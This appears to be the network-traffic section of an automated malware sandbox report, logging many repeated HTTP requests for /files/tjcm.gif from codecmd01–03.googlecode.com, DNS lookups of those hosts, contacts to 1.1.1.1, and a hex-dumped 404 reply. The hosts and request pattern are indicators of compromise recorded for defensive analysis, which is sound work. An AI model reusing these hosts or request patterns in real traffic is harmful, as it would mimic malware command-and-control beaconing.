                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficDNS traffic detected: DNS query: codecmd01.googlecode.com
                                      Source: global trafficDNS traffic detected: DNS query: codecmd02.googlecode.com
                                      Source: global trafficDNS traffic detected: DNS query: codecmd03.googlecode.com
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 